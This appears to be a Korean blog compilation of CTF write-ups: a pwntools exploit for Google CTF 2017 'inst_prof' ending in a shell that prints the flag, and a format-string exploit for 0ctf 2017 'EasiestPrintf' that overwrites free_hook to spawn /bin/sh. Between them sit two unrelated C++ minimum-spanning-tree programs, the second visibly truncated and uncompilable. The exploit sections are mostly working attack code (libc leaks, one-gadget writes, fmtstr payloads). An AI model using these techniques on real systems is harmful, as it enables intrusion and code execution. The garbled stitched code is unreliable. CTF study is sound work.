# Exploit script for the Google CTF 2017 "inst_prof" challenge, as posted in
# the writeup. Python 2 / pwntools (print statement, integer `/`, str payloads).
# The listing was collapsed onto a single line; the statement breaks and the
# two loop bodies below are reconstructed — NOTE(review): confirm the loop
# extents against the original. Every numeric offset is specific to the
# challenge binary/libc build and is left exactly as posted.
from pwn import *
pad=lambda x:x.ljust(4,'\x90')          # pad a short instruction to the 4-byte slot with NOPs
asm_=lambda x:asm(x,arch='amd64')       # shorthand for amd64 assembly
#r=process('./inst_prof')
r=remote('inst-prof.ctfcompetition.com',1337)
r.recvuntil('ready\n')
#raw_input()
# Instruction snippets sent to the service, one 4-byte slot each.
p1=asm("add r12,rbx", arch = 'amd64')
p2=asm("add r12,rsp",arch='amd64')
p3=asm('add r12,QWORD PTR [rsp]',arch='amd64')
p4=asm('mov r14,QWORD PTR [rsp]',arch='amd64')
p5=asm('mov r14w,dx',arch='amd64')
p6=asm('inc r14',arch='amd64')
p7=asm('mov r14b,0x58',arch='amd64')
print len(p1)
r.send(p1+'\x90')
#raw_input()
# Each reply is an 8-byte value; the script negates it mod 2**64 and rescales
# by 0x1000 before applying a build-specific offset.
libc=0x10000000000000000-u64(r.recv(8))
libc=libc/0x1000 - 0x5eafff+0x4000#+1
if libc%16 !=0:
    libc+=1
print hex(libc)
print len(p2)
r.send(pad(p2))
leak=u64(r.recv(8))
leak=0x10000000000000000-leak
leak=leak/0x1000
if leak%16==6:
    leak+=1
print hex(leak)
stack_obj=leak+1+0x70#+1
#raw_input('>')
r.send(pad(p3))
leak=u64(r.recv(8))
leak=0x10000000000000000-leak
leak=leak/0x1000
code=leak-0xb17#+1
if code%16 !=0:
    code+=1
print hex(code)
extra=code%0x10000
extra=extra/0x1000
print extra
# One 8-byte reply per 4-byte slot sent: 3 single slots plus (0x202+extra) copies of p6.
r.send(pad(p4)+pad(p5)+pad(p6)*(0x202+extra)+pad(p7))
r.recv(8*(3+0x202+extra))
onegadget=libc+0xe9f2d
#onegadget=libc+0xf0567
print hex(onegadget)
raw_input('>')
# Writes the 6 low bytes of onegadget one byte at a time, advancing r14b.
# NOTE(review): on Python 2, hex() of a long carries a trailing 'L'; verify
# that hex(onegadget)[-2:] really yields two hex digits here.
for i in range(6):
    p8=asm('mov BYTE PTR [r14], {}'.format('0x'+hex(onegadget)[-2:]),arch='amd64')
    onegadget=onegadget/0x100
    r.send(pad(p8))
    r.send(pad(asm('mov r14b, {}'.format(hex(0x59+i)),arch='amd64')))
    r.recv(8)
#r.interactive()
p10=asm('mov r14,rsp',arch='amd64')
r.send(pad(p10))
raw_input('?')
p11=asm_('mov r14b,{}'.format(hex(stack_obj%0x100)))
r.send(pad(p11))
#r.send(p5)
#p5=asm('mov r14w,dx',arch='amd64')
raw_input('>>')
# Zeroes 8 consecutive bytes at r14. Note the print uses %100 while the
# address arithmetic uses %0x100 — the printed value is only diagnostic.
for i in range(8):
    p8=asm('mov BYTE PTR [r14], 0',arch='amd64')
    r.send(pad(p8))
    print stack_obj%100+i+1
    r.send(pad(asm('mov r14b, {}'.format(hex(stack_obj%0x100+i+1)),arch='amd64')))
p9=asm('mov BYTE PTR [rsp],0x54',arch='amd64')
raw_input('>>>>')
r.send(p9)
r.interactive()










8번째로 풀었다. 의도한 풀이는 아닌 것 같다.

다른 문제에서 라이브러리를 가져와서 쉘을 땄다 ㅠ


00\x00$ id

uid=1337(user) gid=1337(user) groups=1337(user)

$ ls

flag.txt

inst_prof

$ cat flag.txt

CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}

//
//  main.cpp
//  kruskal_algo
//
//  Created by 김세희 on 2017. 5. 28..
//  Copyright © 2017년 김세희. All rights reserved.
//

// NOTE(review): the header names were lost in extraction; restored from what
// the code uses (printf, memset, priority_queue, vector).
#include <cstdio>
#include <cstring>
#include <queue>
#include <vector>
using namespace std;

// Sentinel meaning "no edge" in the adjacency matrix.
// NOTE: a macro named `max` also hides std::max after `using namespace std`.
#define max 99999
// Symmetric 7x7 weighted adjacency matrix; main() prints vertices as 'A'+index.
int G[7][7]={{max,8,9,max,max,max,max},{8,max,max,2,11,max,max},{9,max,max,4,max,max,max},{max,2,4,max,max,7
    ,max},{max,11,max,max,max,3,10},{max,max,max,7,3,max,4},{max,max,max,max,10,4,max}};

// Hand-rolled union-find: -1 = vertex not yet in any tree, v = root of its
// tree, any other value = parent link followed by rep_check().
int represent[7];
// Declared but not referenced anywhere in this listing.
int check[7],path[7];
// An undirected edge between vertex indices v1 and v2 with its weight.
struct Edge{
    int v1,v2;
    int weight;
};
// Comparator for std::priority_queue: reports the heavier edge as "greater",
// so the queue's top() is always the lightest remaining edge.
struct comp{
    bool operator()(struct Edge lhs,struct Edge rhs){
        return rhs.weight<lhs.weight;
    }
};
// Find the representative (root) of v's tree by following parent links.
// Returns -1 if v (or the link being followed) is not in any tree yet,
// otherwise the root vertex whose represent[] entry is itself.
int rep_check(int v){
    int cur=v;
    for(;;){
        int parent=represent[cur];
        if(parent==-1)
            return -1;
        if(parent==cur)
            return cur;
        cur=parent;
    }
}
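// Kruskal's minimum spanning tree over the global matrix G.
// Prints each accepted edge with its weight and the running total.
int main(int argc, const char * argv[]) {
    // Min-heap of candidate edges (comp orders by ascending weight). The
    // template arguments were lost in extraction and are restored here.
    priority_queue<Edge,vector<Edge>,comp> q;
    int i,j,w,v1,v2,d=0;   // d: total weight of the accepted edges so far
    // -1 marks "vertex not yet in any tree" for the union-find in represent[].
    memset(represent,-1,sizeof(represent));
    struct Edge E;
    // G is symmetric, so only the upper triangle is enqueued.
    for(i=0;i<7;i++){
        for(j=i+1;j<7;j++){
            if(G[i][j]!=max){
                E.v1=j;
                E.v2=i;
                E.weight=G[i][j];
                q.push(E);
            }
        }
    }
    while(!q.empty()){
        v1=q.top().v1;
        v2=q.top().v2;
        w=q.top().weight;
        q.pop();
        if(represent[v1]==-1&&represent[v2]==-1){
            // Both endpoints are new: start a tree rooted at v1.
            represent[v1]=v1;represent[v2]=v1;
        }
        else if(rep_check(v1)==rep_check(v2))
            continue;   // same tree: this edge would close a cycle
        else{
            // Merge the two trees; the unassigned side joins the other's root,
            // otherwise v2's root is hung under v1.
            if(represent[v1]==-1)
                represent[v1]=rep_check(v2);
            else if(represent[v2]==-1)
                represent[v2]=rep_check(v1);
            else
                represent[rep_check(v2)]=v1;
        }
        d+=w;
        printf("%c - %c diatance : %d total : %d\n",'A'+v1,'A'+v2,w,d);
    }
    return 0;
}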





+inverse

//
//  main.cpp
//  kruskal_inverse_algo
//
//  Created by 김세희 on 2017. 5. 28..
//  Copyright © 2017년 김세희. All rights reserved.
//

#include 
#include 
#include
#include
using namespace std;

// Sentinel meaning "no edge" in the adjacency matrix.
// NOTE: a macro named `max` also hides std::max after `using namespace std`.
#define max 99999
// Symmetric 7x7 weighted adjacency matrix; edges are removed from it in place
// by setting both G[v1][v2] and G[v2][v1] back to `max`.
int G[7][7]={{max,8,9,max,max,max,max},{8,max,max,2,11,max,max},{9,max,max,4,max,max,max},{max,2,4,max,max,7
    ,max},{max,11,max,max,max,3,10},{max,max,max,7,3,max,4},{max,max,max,max,10,4,max}};
// Flag reset to 0 before each cir() call and tested afterwards; presumably
// cir() sets it when v1 and v2 are still connected — cir() is not in this listing.
int ch;
int represent[7];
// check[] is cleared before each cir() call; path[] is not referenced here.
int check[7],path[7];
// An undirected edge between vertex indices v1 and v2 with its weight.
struct Edge{
    int v1,v2;
    int weight;
};
struct comp{
    bool operator()(struct Edge edge1,struct Edge edge2){
        // NOTE(review): extraction dropped everything between `edge1.weight`
        // and `,comp> q;` — the rest of comp::operator(), the whole cir()
        // function that the loop below calls, and main()'s signature with its
        // `priority_queue<Edge,vector<Edge>` declaration are missing from
        // this listing, so it cannot compile as shown.
        return edge1.weight,comp> q;
    int i,j,w,v1,v2,d=0,temp;
    memset(represent,0,7*sizeof(int));
    struct Edge E;
    // Enqueue the upper triangle of G and start d at the total weight of all edges.
    for(i=0;i<7;i++){
        for(j=i+1;j<7;j++){
            if(G[i][j]!=max){
                E.v1=j;
                E.v2=i;
                E.weight=G[i][j];
                q.push(E);
                d+=G[i][j];
            }
        }
    }
    // Reverse-delete: tentatively remove each edge from G, keep the removal
    // only if cir() reports the endpoints still connected (ch != 0).
    while(!q.empty()){
        v1=q.top().v1;
        v2=q.top().v2;
        w=q.top().weight;
        q.pop();
        temp=G[v1][v2];
        G[v1][v2]=max;G[v2][v1]=max;
        memset(check,0,7*sizeof(int));
        ch=0;
        cir(v1,v2);
        if(!ch){
            // Removing this edge would disconnect the graph: put it back.
            G[v1][v2]=temp;
            G[v2][v1]=temp;
            continue;
        }
        d-=w;
        printf("%c - %c diatance : %d total : %d\n",'A'+v1,'A'+v2,w,d);
    }
}



printf는 문자열이 일정 크기를 넘어가면 malloc/free를 호출한다(vfprintf). FSB를 이용하여 malloc_hook, free_hook을 덮어쓸 수 있다.

혹은 stdout의 함수포인터를 덮을 수도 있다. 

32bit이기 때문에

http://say2.tistory.com/262


write = {_IO_2_1_stdout + 148: 0x0804A570 - 0x1c, 0x0804A570: system + 1}


payload = '/bin/sh;'

payload += fmtstr_payload(9, write, len(p), 'byte')



출처: http://say2.tistory.com/262 [say2]


p.sendlineafter('Bye','/bin/sh;'+fmtstr_payload(9,{free_hook:system-0x08080808})+"%100000c")

이것도 됨


# Exploit script for the 0ctf 2017 "EasiestPrintf" challenge, as posted in the
# writeup. Python 2 / pwntools (raw_input, str payloads). The listing was
# collapsed onto one line; statement breaks are restored below. The offsets
# are specific to the author's i386 libc build and are left as posted.
from pwn import *
p=process('./EasiestPrintf')
libc=ELF('/lib/i386-linux-gnu/libc.so.6')
binary=ELF('./EasiestPrintf')
open_got=0x8049FE8
p.sendlineafter('read:\n',str(open_got))
# NOTE(review): `libc` is rebound from the ELF object to an integer base here;
# the ELF object (and `binary`) is never used afterwards.
libc=int(p.recv(10),16)-0xd5570
log.info("libc: "+hex(libc))
malloc_hook=libc+0x1b2768
log.info("malloc_hook: "+hex(malloc_hook))
free_hook=libc+0x1b38b0#0x1b3536
one_gadget=libc+0x3ac69#0x5fbc5
system=libc+0x3ada0
log.info("one_gadget"+hex(one_gadget))
log.info("system"+hex(system))
#0x5fbc5 0x5fbc6
raw_input()
# The "%100000c" tail is what makes the output exceed the size at which
# vfprintf allocates, which is the reason the hook overwrite takes effect.
p.sendlineafter('Bye','/bin/sh;'+fmtstr_payload(9,{free_hook:one_gadget-0x08080808})+"%100000c")
p.interactive()


